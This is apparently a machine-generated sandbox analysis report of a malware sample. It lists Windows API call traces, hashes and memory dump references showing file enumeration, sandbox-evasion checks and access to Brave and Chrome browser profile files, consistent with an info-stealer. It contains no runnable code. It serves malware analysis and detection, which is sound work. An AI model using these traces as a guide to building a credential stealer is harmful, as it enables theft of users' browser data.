                            • Opcode Fuzzy Hash: 09b0b08081718a8b4b2c583ae12d7cab27d98d2a992bbade59cc830375f50576
                            • Instruction Fuzzy Hash: CCF0A77451C3495BEB146B78D84B72DF7D8EB02350F1C492DEEAAC2191E674C8449177

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 4778396e779ec218aa3b9fb42d326d0a2fddf2a753d06bf89dd30528441d84b0
                            • Instruction ID: f06685dbb8d08ad36bafd13655a8bbc4843ed11b12f2d55b21e31d4d300255e7
                            • Opcode Fuzzy Hash: 4778396e779ec218aa3b9fb42d326d0a2fddf2a753d06bf89dd30528441d84b0
                            • Instruction Fuzzy Hash: F2E0DF15708249ABCB205BB99CA8CCB7BAA8FC4200B46802ABA444BA55E974DD06C325
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D61046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D6104D
                            • ExitProcess.KERNEL32 ref: 00D61058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D6106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00D610AB
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 30b10f1e9e0143621802ed323c4fe642ed3460982cf4cbacbabd92ed55616d94
                            • Instruction ID: bbfb6ce103ffc8f4003b552fa178f2069258d5ca20b75bb05978096d9787a639
                            • Opcode Fuzzy Hash: 30b10f1e9e0143621802ed323c4fe642ed3460982cf4cbacbabd92ed55616d94
                            • Instruction Fuzzy Hash: 9BE04F702883447FE62207658C49F163A6CAB43B41F054046F6449B0E1C1E5A801AA39
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D723D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D723F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D72402
                            • lstrlen.KERNEL32(\*.*), ref: 00D7240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D72436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D72486
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 24c316b1f6686686a069952302fff82d0e25a57d76ebd9a101ae48da166d4d3d
                            • Instruction ID: d0bbd6f353624cc5bfa94673e055817e2c08733237ca49b72b20175de87a9b38
                            • Opcode Fuzzy Hash: 24c316b1f6686686a069952302fff82d0e25a57d76ebd9a101ae48da166d4d3d
                            • Instruction Fuzzy Hash: F5A2803191165A9FCB21EFB8DC89ABE77B9EF44700F098029B809D7251EB74DD458BB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D616E2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6176C
                            • lstrcat.KERNEL32(00000000), ref: 00D61776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D617A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D617EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D617F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61875
                            • lstrcat.KERNEL32(00000000), ref: 00D6187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D618AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D618F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D618FE
                            • lstrlen.KERNEL32(00D91794), ref: 00D61909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61929
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61966
                            • lstrlen.KERNEL32(\*.*), ref: 00D61971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D6199A
                              • Part of subcall function 00D84040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00D8406D
                              • Part of subcall function 00D84040: lstrcpy.KERNEL32(00000000,?), ref: 00D840A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D619C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61A16
                            • lstrlen.KERNEL32(00D91794), ref: 00D61A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61A41
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61A81
                            • lstrlen.KERNEL32(00D91794), ref: 00D61A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61AAC
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D61B45
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D61B70
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D61B8A
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61C03
                            • lstrlen.KERNEL32(00D91794), ref: 00D61C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61C31
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61C74
                            • lstrlen.KERNEL32(00D91794), ref: 00D61C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61CA2
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61CAE
                            • lstrlen.KERNEL32(?), ref: 00D61CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61CE9
                            • lstrlen.KERNEL32(00D91794), ref: 00D61CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61D14
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61DEB
                            • lstrlen.KERNEL32(00D91794), ref: 00D61DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61E19
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D61E56
                            • lstrlen.KERNEL32(00D91794), ref: 00D61E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61E81
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D61E8D
                            • lstrlen.KERNEL32(?), ref: 00D61E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D61F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D61F45
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61F9F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D61FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00D61FE3
                            • lstrlen.KERNEL32(00D91794), ref: 00D61FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6200E
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D62042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6204D
                            • lstrlen.KERNEL32(00D91794), ref: 00D62058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D62075
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D62081
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: 1f3015676520e07133c893e8c40a53adb4ca658b6a9e9a505dcd04d558e9039d
                            • Instruction ID: 51a94cfbfd5da5a846e78acc879e0b897e7f20d2d86504757bb58aa85969b6a8
                            • Opcode Fuzzy Hash: 1f3015676520e07133c893e8c40a53adb4ca658b6a9e9a505dcd04d558e9039d
                            • Instruction Fuzzy Hash: 7D927A35912A1A9BCB21EFA8DD89ABE77B9EF44300F0D4129F805A7211DB74DD45CBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DBEF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D6DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC17
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D6DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DC4C
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DC8F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D6DCD0
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D6DCF0
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D6DD0A
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D6DD1D
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DD7B
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDA3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DDAF
                            • lstrlen.KERNEL32(?), ref: 00D6DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DE19
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DE6F
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DE7B
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DEBB
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6DEE6
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DEF2
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFA5
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6DFB1
                            • lstrlen.KERNEL32(00BF8E60), ref: 00D6DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6DFF4
                            • lstrlen.KERNEL32(00D91794), ref: 00D6DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E022
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D6E02E
                            • lstrlen.KERNEL32(00BF8F20), ref: 00D6E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D6E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00D6E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00D6E0E7
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E11F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D6E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00D6E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E19F
                            • lstrcat.KERNEL32(00000000), ref: 00D6E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00D6E1F9
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E22F
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D6E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E261
                            • lstrcat.KERNEL32(00000000,00BF8F90), ref: 00D6E269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 00D6E274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00D6E2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E349
                            • DeleteFileA.KERNEL32(?), ref: 00D6E381
                            • StrCmpCA.SHLWAPI(?,00BFCFD8), ref: 00D6E3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E445
                            • StrCmpCA.SHLWAPI(?,00BF8F20), ref: 00D6E468
                            • StrCmpCA.SHLWAPI(?,00BF8E60), ref: 00D6E47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00D6E4E0
                            • StrCmpCA.SHLWAPI(?,00BFCF18), ref: 00D6E58E
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D6E5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00D6E639
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E678
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E737
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00D6E776
                            • DeleteFileA.KERNEL32(?), ref: 00D6E7D2
                            • StrCmpCA.SHLWAPI(?,00BF8F50), ref: 00D6E7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6E916
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D6E952
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 2635522530-726946144
                            • Opcode ID: b6c66dde95eb9e8437488463d315e7d4bc38bd59de1baa05f42b1f7db613a1b2
                            • Instruction ID: 8f7a823cda390893aa10b43b653449dc30c9dbd6c375046e3b83013f7e234031
                            • Opcode Fuzzy Hash: b6c66dde95eb9e8437488463d315e7d4bc38bd59de1baa05f42b1f7db613a1b2
                            • Instruction Fuzzy Hash: 73926F75A1160A9FCB20EFB8DC89AAE77B9EF48300F094529F806D7251DB74DD458BB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D718D2
                            • lstrlen.KERNEL32(\*.*), ref: 00D718DD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D718FF
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00D7190B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71932
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D71947
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D71967
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D71981
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D719BF
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D719F2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71A1A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71A25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71A4C
                            • lstrlen.KERNEL32(00D91794), ref: 00D71A5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71A80
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71AB4
                            • lstrlen.KERNEL32(?), ref: 00D71AC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71AE5
                            • lstrcat.KERNEL32(00000000,?), ref: 00D71AF3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71B19
                            • lstrlen.KERNEL32(00BF8FD0), ref: 00D71B2F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71B59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71B64
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71B8F
                            • lstrlen.KERNEL32(00D91794), ref: 00D71BA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71BC3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71BCF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71BF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71C25
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71C30
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71C57
                            • lstrlen.KERNEL32(00D91794), ref: 00D71C69
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71C8B
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71C97
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71CC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71CEF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71CFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71D21
                            • lstrlen.KERNEL32(00D91794), ref: 00D71D33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71D55
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71D61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71D8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71DB9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D71DC4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71DED
                            • lstrlen.KERNEL32(00D91794), ref: 00D71E19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71E36
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71E42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71E68
                            • lstrlen.KERNEL32(00BFCDB0), ref: 00D71E7E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71EB2
                            • lstrlen.KERNEL32(00D91794), ref: 00D71EC6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71EE3
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71EEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71F15
                            • lstrlen.KERNEL32(00BFDAE0), ref: 00D71F2B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71F5F
                            • lstrlen.KERNEL32(00D91794), ref: 00D71F73
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71F90
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71F9C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71FC2
                            • lstrlen.KERNEL32(00BEBF88), ref: 00D71FD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72000
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D7200B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72036
                            • lstrlen.KERNEL32(00D91794), ref: 00D72048
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72067
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D72073
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72098
                            • lstrlen.KERNEL32(?), ref: 00D720AC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D720D0
                            • lstrcat.KERNEL32(00000000,?), ref: 00D720DE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72103
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7213F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D7214E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D72176
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D72181
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: 73633d7ae48d3507857b5cb1ec367bf5ae252259bfcd82adc73a809768b9df34
                            • Instruction ID: 75a7009e862b578259aa6a6be218f8f29fbce06ae555a5a6a8359c7d18b21098
                            • Opcode Fuzzy Hash: 73633d7ae48d3507857b5cb1ec367bf5ae252259bfcd82adc73a809768b9df34
                            • Instruction Fuzzy Hash: 1562723591161A9BCB22EFA8CC49ABEB7B9FF44700F094129F80997251EB74DD45CBB0
                            APIs
                            • wsprintfA.USER32 ref: 00D7392C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D73943
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7396C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D73986
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D739BF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D739E7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D739F2
                            • lstrlen.KERNEL32(00D91794), ref: 00D739FD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73A1A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73A26
                            • lstrlen.KERNEL32(?), ref: 00D73A33
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73A53
                            • lstrcat.KERNEL32(00000000,?), ref: 00D73A61
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73A8A
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D73ACE
                            • lstrlen.KERNEL32(?), ref: 00D73AD8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B05
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73B10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B36
                            • lstrlen.KERNEL32(00D91794), ref: 00D73B48
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B6A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73B76
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73B9E
                            • lstrlen.KERNEL32(?), ref: 00D73BB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73BD2
                            • lstrcat.KERNEL32(00000000,?), ref: 00D73BE0
                            • lstrlen.KERNEL32(00BF8F90), ref: 00D73C0B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73C31
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73C3C
                            • lstrlen.KERNEL32(00BF8FD0), ref: 00D73C5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73C84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73C8F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73CB7
                            • lstrlen.KERNEL32(00D91794), ref: 00D73CC9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73CE8
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73CF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73D1A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D73D47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73D52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73D79
                            • lstrlen.KERNEL32(00D91794), ref: 00D73D8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73DAD
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73DB9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73DE2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73E11
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73E1C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73E43
                            • lstrlen.KERNEL32(00D91794), ref: 00D73E55
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73E77
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73E83
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73EAC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73EDB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D73EE6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73F0D
                            • lstrlen.KERNEL32(00D91794), ref: 00D73F1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73F41
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D73F4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73F75
                            • lstrlen.KERNEL32(?), ref: 00D73F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73FA9
                            • lstrcat.KERNEL32(00000000,?), ref: 00D73FB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D73FE0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7401F
                            • lstrlen.KERNEL32(00BFCD98), ref: 00D7402E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D74056
